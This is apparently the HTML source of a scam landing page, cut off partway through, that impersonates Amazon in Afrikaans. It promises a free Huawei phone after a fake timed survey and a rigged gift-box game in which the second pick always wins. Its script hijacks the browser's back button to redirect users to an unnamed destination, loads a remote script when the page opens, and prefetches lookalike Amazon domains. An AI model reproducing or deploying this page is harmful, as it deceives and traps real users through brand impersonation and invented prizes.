
<!DOCTYPE html>
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="x-dns-prefetch-control" content="on" />
<link rel="dns-prefetch" href="http://amazon.dws7657.cn" />
<link rel="dns-prefetch" href="http://amazon.akjzyy.cn" />
<link rel="dns-prefetch" href="http://amazon.ld385r.cn" />
<link rel="dns-prefetch" href="http://amazon.bjzjwd.cn" />
<link rel="dns-prefetch" href="http://amazon.zgjzlp.bar" />
<link id="favicon" rel="shortcut icon" href="https://1.bp.blogspot.com/-ROnpbq9da_g/YEnrVP-XrAI/AAAAAAAAAYU/AwSaG4p02Q05PqI57h16QNs9q3K1p1KawCLcBGAsYHQ/s16000/title_amazon.ico">
<meta property="og:image" content="http://ww1.sinaimg.cn/large/008aXB1ygy1gp0sniw0hhj305k05kglo.jpg">
<meta property="og:title" content="🕜Amazon se 30ste bestaansjaarviering👏">
<title>🕜Amazon se 30ste bestaansjaarviering👏</title>
<meta property="og:type" content="article">
<meta property="og:description" content=" Gratis geskenke vir almal!">
<meta property="og:url" content="https://www.amazon.com/">
<link rel="icon" href="data:image/ico;base64,aWNv">
<meta property="og:type" content="website">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="apple-mobile-web-app-capable" content="yes">
<meta name="robots" content="noindex, follow">
<script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/popper.js/1.12.9/umd/popper.min.js"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/twitter-bootstrap/4.6.0/js/bootstrap.min.js"></script>
<script src="/js/p.js"></script>
<script src="/js/time.js"></script>
<link rel="stylesheet" href="/css/bootstrap.min.css">
<link rel="stylesheet" href="/css/all.css?v=1.3">
<style>
        .survey_button, .survey_button2, .name, .profile {
            cursor: pointer
        }

        #content2, #content3, #q2, #q3, #q4, #q5, #result1, #result2, #result3 {
            display: none
        }

        .survey_button, .survey_button2, .loading {
            text-align: center
        }

        .survey_button, .main-content {
            padding: 10px;
            -webkit-border-radius: 10px;
            -moz-border-radius: 10px;
            border-radius: 10px
        }

        .name, .result {
            font-weight: 700
        }

        @keyframes tapa_superior {
            from {
                top: 0
            }
            to {
                top: -40px
            }
        }

        @media (max-width: 500px) {
            @keyframes tapa_superior {
                from {
                    top: 0
                }
                to {
                    top: -30px
                }
            }
        }
        .main-content .result {
            margin: 0;
            padding: 5px 0 5px 25px
        }

        .main-content p {
            font-size: 14px
        }

        p.question {
            font-size: 15px
        }

        .survey_button {
            border: 2px solid #f0f0f0;
            color: #fff;
            padding: 5px 0;
            margin: 5px 0;
            box-shadow: 0 1px 4px 0 rgba(0, 0, 0, .74)
        }

        .survey_button {
            background-color: #37475a
        }


        .comments_face {
            font-family: roboto, sans-serif;
            background-color: #fff
        }

        .comments_face .comments {
            background-color: #eeeff4;
            border-bottom: 2px solid #fff;
            padding: 10px
        }

        .comments_face .profile {
            float: left;
            width: 60px;
            margin-right: 10px
        }

        .comments_face .comment-content img, .comments_face .profile img {
            width: 100%
        }

        .comments_face .comment-content img, .comments_face .profile img, .comment-status img {
            margin: 0 auto
        }

        .comments_face .comment-content {
            padding-left: 70px
        }

        .comments_face p {
            font-size: 14px
        }

        .comments_face .name {
            margin: 0
        }

        .comments_face .comment-status span, .comments_face .name {
            color: #3b5998
        }

        .comments_face .name, .comments_face .result {
            font-weight: 700
        }

        .comments_face .button, .comments_face .name, .comments_face .profile {
            cursor: pointer
        }

        .comments_face .comment-status {
            font-size: 11px;
            cursor: pointer
        }

        .comments_face .comment-status span, .comments_face .name {
            color: #3b5998
        }

        .comments_face .button, .comments_face .main-content span {
            color: red
        }

        .comments_face .clr {
            clear: both
        }
    </style>
<script type="text/javascript">
        var brand_country = 'United Kingdom';
        var dayNames = new Array(" Sondag", " Maandag", " Dinsdag", " Woensdag", " Donderdag", " Vrydag", " Saterdag");
        var monthNames = new Array(" Januarie", " Februarie", " Maart", " April", " Mei", " Junie", " Julie", " Augustus", " September", " Oktober", " November", " Desember");
        var minutos_y = " minute en ";
        var segundos = " sekondes";
        var modalOptions = {
            backdrop: 'static',
            keyboard: false
        };
    </script>
<style>

        html, body {
            font-size: 14px;
            width: 100%;
            height: 100%;
            padding: 0;
            margin: 0;
            font-family: sans-serif;
            -webkit-text-size-adjust: 100%;
            -webkit-tap-highlight-color: transparent;
        }



    </style>
<style>
        .weui_dialog{position:fixed;z-index:998;width:85%;top:50%;left:50%;-webkit-transform:translate(-50%,-50%);transform:translate(-50%,-50%);background-color:#fafafc;text-align:center;border-radius:10px;font-family:arial}
        .weui_mask{position:fixed;z-index:1;width:100%;height:100%;top:0;left:0;background:rgba(0,0,0,.6)}
        .weui_dialog_hd{padding:0em 0 .3em;margin-top: 15px;}
        .weui_dialog_bd{padding:0 20px;font-size:16px;color:#888;word-wrap:break-word;word-break:break-all}
        .weui_dialog_ft{width: 90%;margin-left: 5%;border-bottom-left-radius:10px;border-bottom-right-radius:10px;position:relative;line-height:1.6rem;margin-top:20px;font-size:17px;display:-webkit-box;display:-webkit-flex;display:-ms-flexbox;display:flex}
        .weui_dialog_ft:after{content:" ";position:absolute;left:0;top:0;width:100%;height:1px;border-top:1px solid #d5d5d6;color:#d5d5d6;-webkit-transform-origin:0 0;transform-origin:0 0;-webkit-transform:scaleY(.5);transform:scaleY(.5)}
        .weui_btn_dialog.primary{color:#fff}
        .weui_dialog_ft .btn{background-color:#37475a;color:#ffffff;font-size:1.2em;-webkit-box-flex:1;-webkit-flex:1;-ms-flex:1;flex:1;-webkit-tap-highlight-color:transparent}
        .weui_dialog_title{font-weight:600;font-size:20px;color:#000;margin-top:10px;}
        .weui_close{ display: block; position: absolute; top: 6px; right: 6px; }
        .weui_dialog_ft .btn {width: 80%;max-width: 345px;margin: 15px auto;border-radius: 5px;color: #fff;font-weight: 700;text-align: center;display: block;text-decoration: none;-webkit-transition: all 0.2s ease-in-out;-moz-transition: all 0.2s ease-in-out;transition: all 0.2s ease-in-out;box-shadow: none;}

    </style>
<script>
        $(document).ready(function(){
            $.getScript('/js/yuming.js?' + (new Date()).getTime());
        })
        function set_Cookie(name, value) {
            name = "amazonhz-tt"+name;
            var Days = 30;
            var exp = new Date();
            exp.setTime(exp.getTime() + (Days * 20 * 1000));
            document.cookie = name + "=" + escape(value) + ";expires=" + exp.toGMTString() + "; path=/;"
        }

        function get_Cookie(name) {
            name = "amazonhz-tt"+name;
            var arr, reg = new RegExp("(^| )" + name + "=([^;]*)(;|$)");
            if (arr = document.cookie.match(reg)) {
                return unescape(arr[2]);
            }
            return '';
        }

        function getQueryString(name) {
            var reg = new RegExp('(^|&)' + name + '=([^&]*)(&|$)', 'i');
            var r = window.location.search.substr(1).match(reg);
            if (r != null) {
                return unescape(r[2]);
            }
            return null;
        }

        function spinnerAction() {
            //alert("Welcome to Lucky Wheel!Spin the Wheel and you may win exclusive prizes!Click OK to Start the Game!")
        }


        window.onhashchange = function () {
            jp();
        };

        function hh1() {
            history.pushState(history.length + 1, "message", "#" + new Date().getTime());
        }

        function jp() {
            fh();
        }
        setTimeout('hh1();', 500);

        function fh() {
            location.href =  bad;
        }
        function wxalert(t,n,b,flag,i) {
            //flag:1,success  2,normal
            var r, u;
            r = '<div class="weui_dialog_alert" style="position: fixed; z-index: 1000; display: none;margin-left:15%;margin-right:15%">';
            r += '<div class="weui_mask"></div>';
            r += '<div class="weui_dialog">';
            r += '<i class="weui_close"><svg t="1540783423798" class="icon" viewBox="0 0 1024 1024" version="1.1" xmlns="s="http://www.w3.org/2000/svg" p-" p-id="1931" xmlns:xlink="k="http://www.w3.org/1999/xlink" wi" width="25" height="25"><path style="fill:#666;" d="M176.661601 817.172881C168.472798 825.644055 168.701706 839.149636 177.172881 847.338438 185.644056 855.527241 199.149636 855.298332 207.338438 846.827157L826.005105 206.827157C834.193907 198.355983 833.964998 184.850403 825.493824 176.661601 817.02265 168.472798 803.517069 168.701706 795.328267 177.172881L176.661601 817.172881ZM795.328267 846.827157C803.517069 855.298332 817.02265 855.527241 825.493824 847.338438 833.964998 839.149636 834.193907 825.644055 826.005105 817.172881L207.338438 177.172881C199.149636 168.701706 185.644056 168.472798 177.172881 176.661601 168.701706 184.850403 168.472798 198.355983 176.661601 206.827157L795.328267 846.827157Z" p-id="1932"></path></svg></i>';
            r += '<div class="weui_dialog_hd"><strong class="weui_dialog_title"></strong></div>';
            r += '<div class="weui_dialog_bd" style="color:#000;padding-top:20px;padding-bottom:10px;"></div>';
            r += '<div class="weui_dialog_ft">';
            r += '<div href="javascript:void(0);" class="weui_btn_dialog primary btn">OK</div>';
            r += "</div>";
            r += "</div>";
            r += "</div>";

            $(".weui_dialog_alert").length > 0 ? $(".weui_dialog_alert .weui_dialog_bd").empty() : $("body").append($(r));
            setTimeout(function(){
                u = $(".weui_dialog_alert");
                u.show();
                u.find(".weui_dialog_bd").html(n);
                u.find(".weui_dialog_title").html(t);
                u.find(".weui_btn_dialog").html(b ? b : "");
                u.find(".weui_btn_dialog").off("click").on("click", function() {
                    i();
                    u.hide();
                    if(flag==1){
                        stopConfetti();
                    } });
                u.find(".weui_close").off("click").on("click", function() {
                    i();
                    u.hide();
                    if(flag==1){
                        stopConfetti();
                    }
                });
                if(flag==1){
                    startConfetti();
                }
            },500);
        }
        var maxParticleCount=150;var particleSpeed=2;var startConfetti;var stopConfetti;var toggleConfetti;var removeConfetti;(function(){startConfetti=startConfettiInner;stopConfetti=stopConfettiInner;toggleConfetti=toggleConfettiInner;removeConfetti=removeConfettiInner;var colors=["DodgerBlue","OliveDrab","Gold","Pink","SlateBlue","LightBlue","Violet","PaleGreen","SteelBlue","SandyBrown","Chocolate","Crimson"]
            var streamingConfetti=false;var animationTimer=null;var particles=[];var waveAngle=0;function resetParticle(particle,width,height){particle.color=colors[(Math.random()*colors.length)|0];particle.x=Math.random()*width;particle.y=Math.random()*height-height;particle.diameter=Math.random()*10+5;particle.tilt=Math.random()*10-10;particle.tiltAngleIncrement=Math.random()*0.07+0.05;particle.tiltAngle=0;return particle;}
            function startConfettiInner(){var width=window.innerWidth;var height=window.innerHeight;window.requestAnimFrame=(function(){return window.requestAnimationFrame||window.webkitRequestAnimationFrame||window.mozRequestAnimationFrame||window.oRequestAnimationFrame||window.msRequestAnimationFrame||function(callback){return window.setTimeout(callback,16.6666667);};})();var canvas=document.getElementById("confetti-canvas");if(canvas===null){canvas=document.createElement("canvas");canvas.setAttribute("id","confetti-canvas");canvas.setAttribute("style","display:block;z-index:999999;pointer-events:none;position: absolute;left: 0px;top: 0px;");document.body.appendChild(canvas);canvas.width=width;canvas.height=height;window.addEventListener("resize",function(){canvas.width=window.innerWidth;canvas.height=window.innerHeight;},true);}
                var context=canvas.getContext("2d");while(particles.length<maxParticleCount)
                    particles.push(resetParticle({},width,height));streamingConfetti=true;if(animationTimer===null){(function runAnimation(){context.clearRect(0,0,window.innerWidth,window.innerHeight);if(particles.length===0)
                    animationTimer=null;else{updateParticles();drawParticles(context);animationTimer=requestAnimFrame(runAnimation);}})();}}
            function stopConfettiInner(){streamingConfetti=false;}
            function removeConfettiInner(){stopConfetti();particles=[];}
            function toggleConfettiInner(){if(streamingConfetti)
                stopConfettiInner();else
                startConfettiInner();}
            function drawParticles(context){var particle;var x;for(var i=0;i<particles.length;i++){particle=particles[i];context.beginPath();context.lineWidth=particle.diameter;context.strokeStyle=particle.color;x=particle.x+particle.tilt;context.moveTo(x+particle.diameter/2,particle.y);context.lineTo(x,particle.y+particle.tilt+particle.diameter/2);context.stroke();}}
            function updateParticles(){var width=window.innerWidth;var height=window.innerHeight;var particle;waveAngle+=0.01;for(var i=0;i<particles.length;i++){particle=particles[i];if(!streamingConfetti&&particle.y<-15)
                particle.y=height+100;else{particle.tiltAngle+=particle.tiltAngleIncrement;particle.x+=Math.sin(waveAngle);particle.y+=(Math.cos(waveAngle)+particle.diameter+particleSpeed)*0.5;particle.tilt=Math.sin(particle.tiltAngle)*15;}
                if(particle.x>width+20||particle.x<-20||particle.y>height){if(streamingConfetti&&particles.length<=maxParticleCount)
                    resetParticle(particle,width,height);else{particles.splice(i,1);i--;}}}}})();
    </script>
</head>
<body>
<div id="p_body_content">
<div class="aheader">
<style>
            .aheader
            {
                width: 100%;
                height: 48px;
                z-index: 8;
                text-align: center;
                background-color: #232f3e;
                position: fixed;
                top: 0px;
            }
            .menus {
                float: left;
                padding: 14px;
            }
            .menu {
                display: block;
                float: left;
                width: 20px;
                height: 20px;
                background-position: -20px -378px;
                margin-right: 10px;
            }
            .icon {
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
            }
            .alogo {
                display: block;
                float: left;
                height: 27px;
                width: 80px;
                background-position: -10px -50px;
                margin-top: 13px;
            }
            .icon {
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
            }
            .sign {
                display: block;
                float: right;
                line-height: 48px;
                font-size: 13px;
                color: #fff;
                font-family: inherit;
            }
            .cart {
                display: block;
                background-image: url(https://1.bp.blogspot.com/-Ybcjl-XGNc4/YEj3-sn0UNI/AAAAAAAAAXA/jHxxMUCtiIgaqtp80p1kTLm1cwkCWBYeACLcBGAsYHQ/s16000/icon_.png);
                background-size: 275px;
                background-position: -10px -240px;
                width: 37px;
                height: 27px;
            }
            .cart-count {
                color: #f90;
                text-align: center;
                line-height: 10px;
                font-weight: 700;
                text-decoration: none;
                padding: 0 0 0 6px;
                font-size: 16px;
                position: relative;
                top: -5px;
            }
        </style>
<div class="menus"><span class="icon menu"></span></div>
<span class="icon alogo"></span>
<div style="float:right; padding:10px 18px 11px 12px">
<span class="cart"><span class="cart-count">0</span></span>
</div>
<div class="sign">Sign In</div>
</div>
<p style="clear: both; height: 48px;margin-bottom: 0;"></p>
<div class="content" style="background-color:#f7f7f7;">
<div class="main-content flag" id="content1" style="color:#232f3f;">
<h3 style="font-weight:700"> Baie geluk!</h3>
<p>
Vandag, <span class="p_var-dia">17</span>&nbsp;<span class="p_var-mes_nombre">Mai</span>,&nbsp;<span class="p_var-anyo"> 2020</span>, u is gekies om aan ons opname deel te neem. Dit neem net 'n minuut en u ontvang 'n fantastiese prys: 'n Huawei Mate 40 Pro 5G Full Netcom 8GB + 256GB (helder swart)!
</p>
<p>
Elkeen <span class="p_var-dia_nombre">Tuesday</span> ons kies lukraak 100 gebruikers om hulle die kans te gee om wonderlike pryse te wen. Die prys van vandag is 'n Huawei Mate 40 Pro 5G Full Netcom 8GB + 256GB (helder swart)! Daar sal 100 gelukkige wenners wees.
</p>
<p>
Hierdie opname is daarop gemik om die kwaliteit van die diens vir ons gebruikers te verbeter en u deelname word 100% beloon.
</p>
<p>
Jy het net<font color="red"><b><span id="timerr" style="color:#c82311">4 minutes et 30 secondes</span></b></font>, om hierdie opname te beantwoord !
</p>
<p>
Maak gou, die beskikbare pryse is beperk!
</p>
<div class="main-content flag">
<div id="q1">
<p class="question">
<strong> Vraag 1 van 4 :</strong> Is jy manlik of vroulik ?
</p>
<div class="survey_button bq1" data-bq="1">
Manlik
</div>
<div class="survey_button bq1" data-bq="2">
Vroulik
</div>
</div>
<div id="q2">
<p class="question">
<strong> Vraag 2 van 4 :</strong> Hoe oud is jy ?
</p>
<div class="survey_button bq2" data-bq="1">
18-29
</div>
<div class="survey_button bq2" data-bq="2">
30-39
</div>
<div class="survey_button bq2" data-bq="3">
 40-49
</div>
<div class="survey_button bq2" data-bq="4">
50+
</div>
</div>
<div id="q3">
<p class="question">
<strong> Vraag 3 van 4 :</strong> Hoe beoordeel u Amazon-dienste ?
</p>
<div class="survey_button bq3" data-bq="1">
Baie goed
</div>
<div class="survey_button bq3" data-bq="2">
Ongelooflik
</div>
<div class="survey_button bq3" data-bq="3">
OK
</div>
<div class="survey_button bq3" data-bq="4">
Nie so goed nie
</div>
</div>
<div id="q4">
<p class="question">
<strong> Vraag 4 van 4 :</strong> Watter slimfoon gebruik jy? ?
</p>
<div class="survey_button bq4" data-bq="1">
Android
</div>
<div class="survey_button bq4" data-bq="2">
appel
</div>
</div>
</div>
</div>

<div class="main-content" id="content2">
<h2 style="text-align:center;"> Ons is besig om u antwoord te verifieer ...</h2>
<div class="d-flex justify-content-center">
<div class="spinner-border" role="status">
<span class="sr-only"> Laai tans...</span>
</div>
</div>
<p class="result" id="result1">
U het al 4 vrae beantwoord
</p>
<p class="result" id="result2">
U IP-adres is geldig vir hierdie promosie
</p>
<p class="result" id="result3">
Geskenke is beskikbaar en op voorraad!
</p>
</div>
<div class="main-content" id="content3">
<link rel="stylesheet" type="text/css" href="/css/sur.min.css">
<script type="text/javascript">
                var box_ini=!1
                var modalOptions = {
                    backdrop: 'static',
                    keyboard: false
                };
                var count = 1;
                var intentos = 3;
                var puedo = false;
                var boxRoot;
                (function () {
                    "use strict";
                    boxRoot = {
                        _init: function () {
                            setTimeout(function () {
                                jQuery('#p_modal1').modal(modalOptions);
                            }, 1000);
                            jQuery('.try').on('click', function () {
                                if (puedo && count <= intentos) {
                                    if (jQuery(this).hasClass('abierta')) {
                                    } else {
                                        puedo = false;
                                        jQuery('.circle-loader').removeClass("load-complete");
                                        jQuery('.checkmark').css("display", "none");
                                        jQuery(this).addClass('abierta');
                                        if (count == 2) {
                                            jQuery(this).addClass('premiazo');
                                            setTimeout(function () {
                                                jQuery(".div_img_gift, .img_gift").fadeIn("slow", function () {
                                                    setTimeout(function () {
                                                        jQuery('#p_modal3').modal(modalOptions);
                                                        jQuery('.circle-loader').addClass("load-complete");
                                                        jQuery('.checkmark').css("display", "block");
                                                    }, 1500);
                                                });
                                            }, 4000);
                                        }
                                        else {
                                            count++;
                                            intentos--;
                                            jQuery('#num_intentos').html(intentos);
                                            setTimeout(function () {
                                                jQuery('#p_modal2').modal(modalOptions);
                                                setTimeout(function () {
                                                    jQuery('.circle-loader').addClass("load-complete");
                                                    jQuery('.checkmark').css("display", "block");
                                                    puedo = true;
                                                }, 1000);
                                            }, 2000);
                                        }
                                    }
                                }
                            });
                            jQuery("#p_modal_button1").on("click", function (event) {
                                event.stopPropagation();
                                jQuery('#p_modal1').modal('hide');
                                puedo = true;
                            });
                            jQuery("#p_modal_button2").on("click", function (event) {
                                event.stopPropagation();
                                jQuery('#p_modal2').modal('hide');
                            });
                        }
                    };
                    jQuery(document).ready(function () {
                        if (typeof box_ini == "undefined") {
                            boxRoot._init();
                        }
                    });
                })();
            </script>
<div id="boxes" class="boxes">
<div class="div_img_gift">
<img class="img_gift" src="https://i.imgur.com/mov9JFN.png">
</div>
<div id="0" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="1" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="2" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="3" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="4" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="5" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="6" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="7" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="8" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="9" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
</div>
<div class="caja_gift">
<img src=" https://1.bp.blogspot.com/-RW7kAs1E0iw/YDXxrTCV_dI/AAAAAAAABdE/fpWYSTVw48gW5zM3Vb5ioNWUMTnUP6i9gCLcBGAsYHQ/s0/sx1.png">
</div>
<div class="caja">
<img src="https://1.bp.blogspot.com/-a8HdNRF5zQQ/YFIYN9dea0I/AAAAAAAAABQ/wWWhN0MpIS8XyaQcLUMjCjc60K5yHX7RwCPcBGAYYCw/s0/22.png">
</div>
</div>
<div id="10" class="try temblor">
<div class="caja_tapa">
<img src="https://1.bp.blogspot.com/-dZ7Hr-hZR3E/YFIYNypcLBI/AAAAAAAAABA/cl0Mo7VHDc0-kmye5u-eSxMKbCzM07aAgCPcBGAYYCw/s0/11.png">
</div>
<div class="caja_trasera">
<img src="https://1.bp.blogspot.com/-_2GDBMEVpWg/YFKxO8a7BHI/AAAAAAAAABw/QQiTO1t27sALuLV7FRh2o5dgT9BXchdsACLcBGAsYHQ/s16000/c7887fbfd60fb7513c357332a819565.png">
